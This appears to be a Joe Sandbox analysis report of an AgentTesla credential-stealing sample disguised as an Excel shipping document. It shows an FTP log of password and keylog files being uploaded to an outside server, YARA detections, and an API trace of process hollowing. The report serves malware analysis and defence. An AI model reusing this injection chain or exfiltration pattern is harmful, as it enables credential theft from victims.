                    Jun 10, 2024 02:45:29.467304945 CEST2149744213.189.52.181192.168.2.4230 OK. Current restricted directory is /
                    Jun 10, 2024 02:45:29.724272966 CEST2149744213.189.52.181192.168.2.4504 Unknown command
                    Jun 10, 2024 02:45:29.728061914 CEST4974421192.168.2.4213.189.52.181PWD
                    Jun 10, 2024 02:45:29.984989882 CEST2149744213.189.52.181192.168.2.4257 "/" is your current location
                    Jun 10, 2024 02:45:29.985388041 CEST4974421192.168.2.4213.189.52.181TYPE I
                    Jun 10, 2024 02:45:30.242754936 CEST2149744213.189.52.181192.168.2.4200 TYPE is now 8-bit binary
                    Jun 10, 2024 02:45:30.243065119 CEST4974421192.168.2.4213.189.52.181PASV
                    Jun 10, 2024 02:45:30.500247955 CEST2149744213.189.52.181192.168.2.4227 Entering Passive Mode (213,189,52,181,254,65)
                    Jun 10, 2024 02:45:30.506071091 CEST4974421192.168.2.4213.189.52.181STOR PW_user-818225_2024_06_09_20_45_26.html
                    Jun 10, 2024 02:45:31.249989033 CEST2149744213.189.52.181192.168.2.4150 Accepted data connection
                    Jun 10, 2024 02:45:31.508450985 CEST2149744213.189.52.181192.168.2.4226-File successfully transferred
                    226-File successfully transferred226 0.258 seconds (measured here), 1.32 Kbytes per second
                    Jun 10, 2024 02:46:43.531194925 CEST4973221192.168.2.4213.189.52.181PASV
                    Jun 10, 2024 02:46:43.787116051 CEST2149732213.189.52.181192.168.2.4227 Entering Passive Mode (213,189,52,181,249,108)
                    Jun 10, 2024 02:46:43.793097019 CEST4973221192.168.2.4213.189.52.181STOR KL_user-818225_2024_07_03_16_38_04.html
                    Jun 10, 2024 02:46:44.542843103 CEST2149732213.189.52.181192.168.2.4150 Accepted data connection
                    Jun 10, 2024 02:46:44.802555084 CEST2149732213.189.52.181192.168.2.4226-File successfully transferred
                    226-File successfully transferred226 0.260 seconds (measured here), 1.07 Kbytes per second

                    Click to jump to process

                    Click to jump to process

                    Click to dive into process behavior distribution

                    Click to jump to process

                    Target ID:0
                    Start time:20:45:03
                    Start date:09/06/2024
                    Path:C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe"
                    Imagebase:0xa40000
                    File size:399'360 bytes
                    MD5 hash:9AD1097EF6D23A86D4B9327E54FDC9BC
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1752622729.00000000052E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1752622729.00000000052E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000000.00000002.1752622729.00000000052E0000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                    • Rule: MALWARE_Win_AgentTeslaV2, Description: AgenetTesla Type 2 Keylogger payload, Source: 00000000.00000002.1752622729.00000000052E0000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1751703167.0000000003D35000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1751703167.0000000003D35000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:true

                    Target ID:1
                    Start time:20:45:03
                    Start date:09/06/2024
                    Path:C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe"
                    Imagebase:0x810000
                    File size:399'360 bytes
                    MD5 hash:9AD1097EF6D23A86D4B9327E54FDC9BC
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.4198295133.0000000002B9C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.4198295133.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.4198295133.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:false

                    Target ID:2
                    Start time:20:45:16
                    Start date:09/06/2024
                    Path:C:\Users\user\AppData\Roaming\Adobe\adobe.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\AppData\Roaming\adobe\adobe.exe"
                    Imagebase:0x7e0000
                    File size:399'360 bytes
                    MD5 hash:9AD1097EF6D23A86D4B9327E54FDC9BC
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Antivirus matches:
                    • Detection: 42%, ReversingLabs
                    • Detection: 50%, Virustotal, Browse
                    Reputation:low
                    Has exited:true

                    Target ID:3
                    Start time:20:45:17
                    Start date:09/06/2024
                    Path:C:\Users\user\AppData\Roaming\Adobe\adobe.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\AppData\Roaming\adobe\adobe.exe"
                    Imagebase:0xcd0000
                    File size:399'360 bytes
                    MD5 hash:9AD1097EF6D23A86D4B9327E54FDC9BC
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.1973196935.000000000330C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.1970186494.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.1970186494.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.1973196935.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.1973196935.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:true

                    Target ID:7
                    Start time:20:45:25
                    Start date:09/06/2024
                    Path:C:\Users\user\AppData\Roaming\Adobe\adobe.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\AppData\Roaming\adobe\adobe.exe"
                    Imagebase:0x1f0000
                    File size:399'360 bytes
                    MD5 hash:9AD1097EF6D23A86D4B9327E54FDC9BC
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:low
                    Has exited:true

                    Target ID:8
                    Start time:20:45:25
                    Start date:09/06/2024
                    Path:C:\Users\user\AppData\Roaming\Adobe\adobe.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\AppData\Roaming\adobe\adobe.exe"
                    Imagebase:0x780000
                    File size:399'360 bytes
                    MD5 hash:9AD1097EF6D23A86D4B9327E54FDC9BC
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.4198576799.0000000002BBC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.4198576799.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.4198576799.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:false

                    Reset < >

                      Execution Graph

                      Execution Coverage:60.4%
                      Dynamic/Decrypted Code Coverage:100%
                      Signature Coverage:64.9%
                      Total number of Nodes:97
                      Total number of Limit Nodes:0
                      execution_graph 647 1470971 648 147098e 647->648 649 14709fd VirtualAlloc 647->649 651 1470a9f 649->651 642 14703d0 643 1470445 642->643 644 1470456 643->644 645 1470a6b VirtualAlloc 643->645 646 1470a9f 645->646 554 52d0000 587 52d0054 554->587 556 52d0006 619 52d0420 556->619 558 52d0083 559 52d0420 VirtualAlloc 558->559 560 52d008f 559->560 561 52d0420 VirtualAlloc 560->561 562 52d0098 561->562 563 52d0420 VirtualAlloc 562->563 564 52d00a1 563->564 565 52d0420 VirtualAlloc 564->565 566 52d00aa 565->566 567 52d0420 VirtualAlloc 566->567 568 52d00b6 567->568 569 52d0155 CreateProcessW 568->569 570 52d0170 569->570 571 52d018b NtUnmapViewOfSection 570->571 572 52d019b 571->572 573 52d01b8 VirtualAllocEx 572->573 574 52d01d2 573->574 575 52d0214 WriteProcessMemory 574->575 576 52d0220 575->576 577 52d02fa WriteProcessMemory 576->577 578 52d031e 576->578 577->576 579 52d034f Wow64GetThreadContext 578->579 580 52d035e 579->580 581 52d039e WriteProcessMemory 580->581 582 52d03aa 581->582 583 52d03e5 Wow64SetThreadContext 582->583 584 52d03f5 583->584 585 52d0407 ResumeThread 584->585 586 52d0415 585->586 588 52d005e 587->588 589 52d0420 VirtualAlloc 588->589 590 52d0083 589->590 591 52d0420 VirtualAlloc 590->591 592 52d008f 591->592 593 52d0420 VirtualAlloc 592->593 594 52d0098 593->594 595 52d0420 VirtualAlloc 594->595 596 52d00a1 595->596 597 52d0420 VirtualAlloc 596->597 598 52d00aa 597->598 599 52d0420 VirtualAlloc 598->599 600 52d00b6 599->600 601 52d0155 CreateProcessW 600->601 602 52d0170 601->602 603 52d018b NtUnmapViewOfSection 602->603 604 52d019b 603->604 605 52d01b8 VirtualAllocEx 604->605 606 52d01d2 605->606 607 52d0214 WriteProcessMemory 606->607 608 52d0220 607->608 609 52d02fa WriteProcessMemory 608->609 610 52d031e 608->610 609->608 611 52d034f Wow64GetThreadContext 610->611 612 52d035e 611->612 613 52d039e WriteProcessMemory 612->613 614 52d03aa 613->614 615 52d03e5 Wow64SetThreadContext 614->615 616 52d03f5 615->616 617 52d0407 ResumeThread 616->617 618 52d0415 617->618 618->556 620 52d0427 619->620 621 52d0432 VirtualAlloc 620->621 622 52d044a 621->622 622->558 639 1470ac9 640 1470b13 CallWindowProcA 639->640 641 1470b4a 640->641 623 1470898 624 14708a9 623->624 631 14704b4 624->631 627 14704b4 VirtualAlloc 628 147091e 627->628 635 14704c0 628->635 632 1470a28 VirtualAlloc 631->632 634 147090a 632->634 634->627 636 1470ad0 CallWindowProcA 635->636 638 1470963 636->638 652 1470888 653 14708a9 652->653 654 14704b4 VirtualAlloc 653->654 655 147090a 654->655 656 14704b4 VirtualAlloc 655->656 657 147091e 656->657 658 14704c0 CallWindowProcA 657->658 659 1470963 658->659

                      Callgraph

                      • Executed
                      • Not Executed
                      • Opacity -> Relevance
                      • Disassembly available
                      callgraph 0 Function_014701C4 1 Function_052D04AB 2 Function_014704C0 3 Function_014703C0 4 Function_0147004D 5 Function_0147014C 6 Function_0147034C 7 Function_052D0420 27 Function_052D0419 7->27 72 Function_052D0450 7->72 8 Function_01470AC9 9 Function_014700C8 10 Function_01470848 11 Function_014700D4 12 Function_014703D0 13 Function_014701D0 14 Function_0147015C 15 Function_01470258 16 Function_014702D8 17 Function_01470264 18 Function_014700E4 19 Function_014702E4 20 Function_01470060 21 Function_014701E0 22 Function_0147016C 23 Function_014701EC 24 Function_0147036C 25 Function_052D0000 25->7 25->27 69 Function_052D0054 25->69 25->72 26 Function_0147046A 28 Function_01470971 29 Function_014700F0 30 Function_01470070 31 Function_01470270 32 Function_014702F0 33 Function_01470178 34 Function_014701F8 35 Function_01470378 36 Function_01470184 37 Function_01470100 38 Function_01470080 39 Function_01470280 40 Function_0147010C 41 Function_01470308 42 Function_01470388 43 Function_01470488 44 Function_01470888 44->2 64 Function_014704B4 44->64 45 Function_01470495 46 Function_01470314 47 Function_01470190 48 Function_01470090 49 Function_052D0477 50 Function_0147039D 51 Function_0147049D 52 Function_0147011C 53 Function_01470499 54 Function_01470898 54->2 54->64 55 Function_01470298 56 Function_01470224 57 Function_014702A4 58 Function_014701A0 59 Function_014700A0 60 Function_01470320 61 Function_014701AC 62 Function_0147012C 63 Function_0147032C 65 Function_014703B4 66 Function_01470230 67 Function_014700B0 68 Function_014702B0 69->7 69->27 69->72 70 Function_014700BC 71 Function_0147013C 72->1 72->49 73 Function_014701B8 74 Function_01470338

                      Control-flow Graph

                      APIs
                        • Part of subcall function 052D0054: CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000042,0000002A,0000002E,?,16B3FE88,00000000), ref: 052D0167
                      • NtUnmapViewOfSection.NTDLL(?,?,0000002E,00000022,?,F21037D0,00000012,?,00000000,00000000,00000000,00000000,00000004,00000000,00000000), ref: 052D0192
                      • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040,0000002E,00000022,?,6E1A959C,00000000,?,?,0000002E,00000022,?,F21037D0), ref: 052D01C9
                      • WriteProcessMemory.KERNELBASE ref: 052D0217
                      • WriteProcessMemory.KERNELBASE(00000026,0000003E,00000026,?,CF14E85B,00000012), ref: 052D02FD
                      • Wow64GetThreadContext.KERNEL32(?,?,0000002E,00000032,?,68A7C7D2,00000000,00000032,0000003A,00000036,?,CF14E85B,00000012), ref: 052D0355
                      • WriteProcessMemory.KERNELBASE(?,68A7C7D2,00000000,00000032,0000003A,00000036,?,CF14E85B,00000012), ref: 052D03A1
                      • Wow64SetThreadContext.KERNEL32(?,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000,00000032,0000003A,00000036), ref: 052D03EC
                      • ResumeThread.KERNELBASE(?,0000002E,?,9E4A3F88,00000000,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000), ref: 052D040C
                      Memory Dump Source
                      • Source File: 00000000.00000002.1752576338.00000000052D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052D0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_52d0000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID: Process$MemoryThreadWrite$ContextWow64$AllocCreateResumeSectionUnmapViewVirtual
                      • String ID:
                      • API String ID: 2814188497-0
                      • Opcode ID: 37430e902d01128bcddca1ad93b7e833f04db2506693cda9d34fb03a2d514acd
                      • Instruction ID: af35bcd3ee1249e2961828f0629a6e7d7107671e978c5cdf56ca85daeafebc8f
                      • Opcode Fuzzy Hash: 37430e902d01128bcddca1ad93b7e833f04db2506693cda9d34fb03a2d514acd
                      • Instruction Fuzzy Hash: AAC1EC757A0244BFE6157BF1DC4EF39B7259F46B08F1480A9E2006F1F1E9E26C118672

                      Control-flow Graph

                      APIs
                        • Part of subcall function 052D0420: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040,?,91AFCA54,00000000,052D0083,0000003C,0000001E,0000004A,0000003E,00000042), ref: 052D043F
                      • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000042,0000002A,0000002E,?,16B3FE88,00000000), ref: 052D0167
                      • NtUnmapViewOfSection.NTDLL(?,?,0000002E,00000022,?,F21037D0,00000012,?,00000000,00000000,00000000,00000000,00000004,00000000,00000000), ref: 052D0192
                      • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040,0000002E,00000022,?,6E1A959C,00000000,?,?,0000002E,00000022,?,F21037D0), ref: 052D01C9
                      • WriteProcessMemory.KERNELBASE ref: 052D0217
                      • WriteProcessMemory.KERNELBASE(00000026,0000003E,00000026,?,CF14E85B,00000012), ref: 052D02FD
                      • Wow64GetThreadContext.KERNEL32(?,?,0000002E,00000032,?,68A7C7D2,00000000,00000032,0000003A,00000036,?,CF14E85B,00000012), ref: 052D0355
                      • WriteProcessMemory.KERNELBASE(?,68A7C7D2,00000000,00000032,0000003A,00000036,?,CF14E85B,00000012), ref: 052D03A1
                      • Wow64SetThreadContext.KERNEL32(?,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000,00000032,0000003A,00000036), ref: 052D03EC
                      • ResumeThread.KERNELBASE(?,0000002E,?,9E4A3F88,00000000,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000), ref: 052D040C
                      Memory Dump Source
                      • Source File: 00000000.00000002.1752576338.00000000052D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052D0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_52d0000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID: Process$MemoryThreadWrite$AllocContextVirtualWow64$CreateResumeSectionUnmapView
                      • String ID:
                      • API String ID: 4009322845-0
                      • Opcode ID: abefd893c78f63ec501357fb14bf61d80a739cae84c00b71e3bd370fcc70d613
                      • Instruction ID: 52f3bc34f34e6695728a1d405c5403bb40e21cbe334ceb90cd644a77ed5cfbc4
                      • Opcode Fuzzy Hash: abefd893c78f63ec501357fb14bf61d80a739cae84c00b71e3bd370fcc70d613
                      • Instruction Fuzzy Hash: 12A1C6747A0204BFE6157BF1DC4EF39B615AF85B08F208168E2047F1F1E9E26D219672

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 341 1470ac9-1470b0b 342 1470b13-1470b48 CallWindowProcA 341->342 343 1470b51-1470b65 342->343 344 1470b4a-1470b50 342->344 344->343
                      APIs
                      • CallWindowProcA.USER32(?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 01470B3B
                      Memory Dump Source
                      • Source File: 00000000.00000002.1751516048.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1470000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID: CallProcWindow
                      • String ID:
                      • API String ID: 2714655100-0
                      • Opcode ID: 0c80ebacbbd5e82e201c621167def390f1f8641083707813469ff1f068b6dfa8
                      • Instruction ID: 483ace49e8ef23b37f220fa90d5bba2e982b45872e247194e345092c09852ff5
                      • Opcode Fuzzy Hash: 0c80ebacbbd5e82e201c621167def390f1f8641083707813469ff1f068b6dfa8
                      • Instruction Fuzzy Hash: 381146B5800248DFCB10CF9AD885BDEBFF4FB49310F24845AE558A7260C375A544CFA1

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 346 14704c0-1470b48 CallWindowProcA 349 1470b51-1470b65 346->349 350 1470b4a-1470b50 346->350 350->349
                      APIs
                      • CallWindowProcA.USER32(?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 01470B3B
                      Memory Dump Source
                      • Source File: 00000000.00000002.1751516048.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1470000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID: CallProcWindow
                      • String ID:
                      • API String ID: 2714655100-0
                      • Opcode ID: 313a4cb84d4ef90412a197e6d8fc4e1c8004de3561f0892f09b66558720e504a
                      • Instruction ID: e38568d630c2257d2c4554b2b9ddff8b624cefe8d9666271de2ca7f221dd765b
                      • Opcode Fuzzy Hash: 313a4cb84d4ef90412a197e6d8fc4e1c8004de3561f0892f09b66558720e504a
                      • Instruction Fuzzy Hash: 511116B5900649DFCB10DF9AD844BDEBFF4FB49324F20842AE519A7220C375A944CFA4

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 352 14703d0-1470453 354 1470456-1470469 352->354 355 14704b4-1470a9d VirtualAlloc 352->355 359 1470aa6-1470aba 355->359 360 1470a9f-1470aa5 355->360 360->359
                      APIs
                      • VirtualAlloc.KERNELBASE(00000000,?,?,?,?,?,?,0147090A,00000040,00001000), ref: 01470A90
                      Memory Dump Source
                      • Source File: 00000000.00000002.1751516048.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1470000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
                      • Opcode ID: e8ec801e71f3f009fcd3fee7a7d1c3d79cc9fc340115e662758805822411e25c
                      • Instruction ID: e7f1f2b65e0448da6035fc148db232617613dbe24f09c961ed30836c379d8488
                      • Opcode Fuzzy Hash: e8ec801e71f3f009fcd3fee7a7d1c3d79cc9fc340115e662758805822411e25c
                      • Instruction Fuzzy Hash: D2319E719093888FCB12DFA9C8547CABFF4EF4A310F14809BD094EB262D3349444CBA5

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 362 1470971-147098c 363 147098e-14709fc 362->363 364 14709fd-1470a9d VirtualAlloc 362->364 372 1470aa6-1470aba 364->372 373 1470a9f-1470aa5 364->373 373->372
                      APIs
                      • VirtualAlloc.KERNELBASE(00000000,?,?,?,?,?,?,0147090A,00000040,00001000), ref: 01470A90
                      Memory Dump Source
                      • Source File: 00000000.00000002.1751516048.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1470000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
                      • Opcode ID: 99ad6d7ab0afbdf47b0db573466535bd0efaac4d34be3856caf41e5ecca5109b
                      • Instruction ID: fd31f662d751b94fd2a30576fffdb2c6604e12ae66303a1adc9b9327a73716a7
                      • Opcode Fuzzy Hash: 99ad6d7ab0afbdf47b0db573466535bd0efaac4d34be3856caf41e5ecca5109b
                      • Instruction Fuzzy Hash: 2F418D75A042448FC711DF69D884A9EBFF1FF89310F25849AE449EB362C734AC05CB91

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 381 14704b4-1470a9d VirtualAlloc 384 1470aa6-1470aba 381->384 385 1470a9f-1470aa5 381->385 385->384
                      APIs
                      • VirtualAlloc.KERNELBASE(00000000,?,?,?,?,?,?,0147090A,00000040,00001000), ref: 01470A90
                      Memory Dump Source
                      • Source File: 00000000.00000002.1751516048.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1470000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
                      • Opcode ID: e29e3dd920de68ae8e7aec125d27dbfb95a7ee932b5bca4a0786600ea32e5e64
                      • Instruction ID: e6007bed90d851ca4bc9a385f4549bb22943d9563f139d98a9e6435b26ded806
                      • Opcode Fuzzy Hash: e29e3dd920de68ae8e7aec125d27dbfb95a7ee932b5bca4a0786600ea32e5e64
                      • Instruction Fuzzy Hash: 5A1125B5900649DFCB20DF9AC444BDEBFF4FB49320F20842AE558A7250D375A944CFA4

                      Control-flow Graph

                      APIs
                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040,?,91AFCA54,00000000,052D0083,0000003C,0000001E,0000004A,0000003E,00000042), ref: 052D043F
                      Memory Dump Source
                      • Source File: 00000000.00000002.1752576338.00000000052D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052D0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_52d0000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
                      • Opcode ID: 06eb02c548db0a05d1e20e56bead04f6bc1efedc2ff2b69c3f0a506310807bbb
                      • Instruction ID: 492b71776c9af27fdf74f9f720d92d04bc82dfc1b448b02b6ec4b27f4196ac12
                      • Opcode Fuzzy Hash: 06eb02c548db0a05d1e20e56bead04f6bc1efedc2ff2b69c3f0a506310807bbb
                      • Instruction Fuzzy Hash: B9D0A9702A43006AE2017FA14C0AF2CA680AF40B09F400814F304380F0E5EA9C180267

                      Execution Graph

                      Execution Coverage:11.1%
                      Dynamic/Decrypted Code Coverage:100%
                      Signature Coverage:2.1%
                      Total number of Nodes:191
                      Total number of Limit Nodes:17
                      execution_graph 37131 290d030 37132 290d048 37131->37132 37133 290d0a2 37132->37133 37141 66c3570 37132->37141 37145 66c1b8c 37132->37145 37149 66c1b9c 37132->37149 37157 66c34a3 37132->37157 37164 66c7952 37132->37164 37173 66c3450 37132->37173 37179 66c3440 37132->37179 37142 66c3580 37141->37142 37185 66c1bc4 37142->37185 37144 66c3587 37144->37133 37146 66c1b97 37145->37146 37147 66c1bc4 GetModuleHandleW 37146->37147 37148 66c3587 37147->37148 37148->37133 37150 66c1ba7 37149->37150 37151 66c79e1 37150->37151 37154 66c79d1 37150->37154 37224 66c6adc 37151->37224 37153 66c79df 37216 66c7af8 37154->37216 37220 66c7b08 37154->37220 37158 66c34aa 37157->37158 37159 66c3474 37157->37159 37158->37133 37160 66c3482 37159->37160 37161 66c1b8c GetModuleHandleW 37159->37161 37162 66c1b9c CallWindowProcW 37160->37162 37161->37160 37163 66c3497 37162->37163 37163->37133 37165 66c795a 37164->37165 37166 66c796a 37164->37166 37165->37133 37167 66c79e1 37166->37167 37169 66c79d1 37166->37169 37168 66c6adc CallWindowProcW 37167->37168 37170 66c79df 37168->37170 37171 66c7af8 CallWindowProcW 37169->37171 37172 66c7b08 CallWindowProcW 37169->37172 37171->37170 37172->37170 37174 66c3476 37173->37174 37175 66c1b8c GetModuleHandleW 37174->37175 37176 66c3482 37175->37176 37177 66c1b9c CallWindowProcW 37176->37177 37178 66c3497 37177->37178 37178->37133 37180 66c3450 37179->37180 37181 66c1b8c GetModuleHandleW 37180->37181 37182 66c3482 37181->37182 37183 66c1b9c CallWindowProcW 37182->37183 37184 66c3497 37183->37184 37184->37133 37186 66c1bcf 37185->37186 37191 66c07f4 37186->37191 37188 66c35e9 37190 66c3657 37188->37190 37196 66c0804 37188->37196 37192 66c07ff 37191->37192 37193 66c18b3 37192->37193 37200 66c1fa6 37192->37200 37208 66c1f17 37192->37208 37193->37188 37197 66c21f0 GetModuleHandleW 37196->37197 37199 66c2265 37197->37199 37199->37190 37201 66c1ff6 37200->37201 37202 66c0804 GetModuleHandleW 37201->37202 37203 66c2042 37202->37203 37204 66c0804 GetModuleHandleW 37203->37204 37207 66c20bc 37203->37207 37205 66c2090 37204->37205 37206 66c0804 GetModuleHandleW 37205->37206 37205->37207 37206->37207 37207->37193 37209 66c1f22 37208->37209 37210 66c0804 GetModuleHandleW 37209->37210 37211 66c2042 37210->37211 37212 66c0804 GetModuleHandleW 37211->37212 37213 66c20bc 37211->37213 37214 66c2090 37212->37214 37213->37193 37214->37213 37215 66c0804 GetModuleHandleW 37214->37215 37215->37213 37218 66c7b16 37216->37218 37217 66c6adc CallWindowProcW 37217->37218 37218->37217 37219 66c7bee 37218->37219 37219->37153 37222 66c7b16 37220->37222 37221 66c6adc CallWindowProcW 37221->37222 37222->37221 37223 66c7bee 37222->37223 37223->37153 37225 66c6ae7 37224->37225 37226 66c7ca2 CallWindowProcW 37225->37226 37227 66c7c51 37225->37227 37226->37227 37227->37153 37238 2b08060 37239 2b080a6 DeleteFileW 37238->37239 37241 2b080df 37239->37241 37228 66c6b28 37229 66c6b29 GetCurrentProcess 37228->37229 37231 66c6bb9 37229->37231 37232 66c6bc0 GetCurrentThread 37229->37232 37231->37232 37233 66c6bfd GetCurrentProcess 37232->37233 37234 66c6bf6 37232->37234 37235 66c6c33 37233->37235 37234->37233 37236 66c6c5b GetCurrentThreadId 37235->37236 37237 66c6c8c 37236->37237 37242 66c3298 37243 66c3300 CreateWindowExW 37242->37243 37245 66c33bc 37243->37245 37245->37245 37246 66c87b8 37247 66c87c3 37246->37247 37248 66c87d3 37247->37248 37250 66c7fb4 37247->37250 37251 66c8808 OleInitialize 37250->37251 37252 66c886c 37251->37252 37252->37248 37253 2b00848 37254 2b0084e 37253->37254 37255 2b0091b 37254->37255 37257 2b0134f 37254->37257 37259 2b01353 37257->37259 37258 2b0147a 37258->37254 37259->37258 37266 2b08120 37259->37266 37270 2b08110 37259->37270 37274 66c0202 37259->37274 37281 66c0210 37259->37281 37288 2b086f0 37259->37288 37292 2b08819 37259->37292 37268 2b08125 37266->37268 37267 2b081fa 37267->37259 37268->37267 37297 2b07808 37268->37297 37272 2b0811f 37270->37272 37271 2b081fa 37271->37259 37272->37271 37273 2b07808 MoveFileA 37272->37273 37273->37271 37275 66c0222 37274->37275 37277 66c02d3 37275->37277 37301 66c0858 37275->37301 37277->37259 37282 66c0222 37281->37282 37283 66c02d3 37282->37283 37285 66c0858 GetModuleHandleW 37282->37285 37283->37259 37284 66c0299 37286 66c82f0 KiUserCallbackDispatcher 37284->37286 37287 66c8300 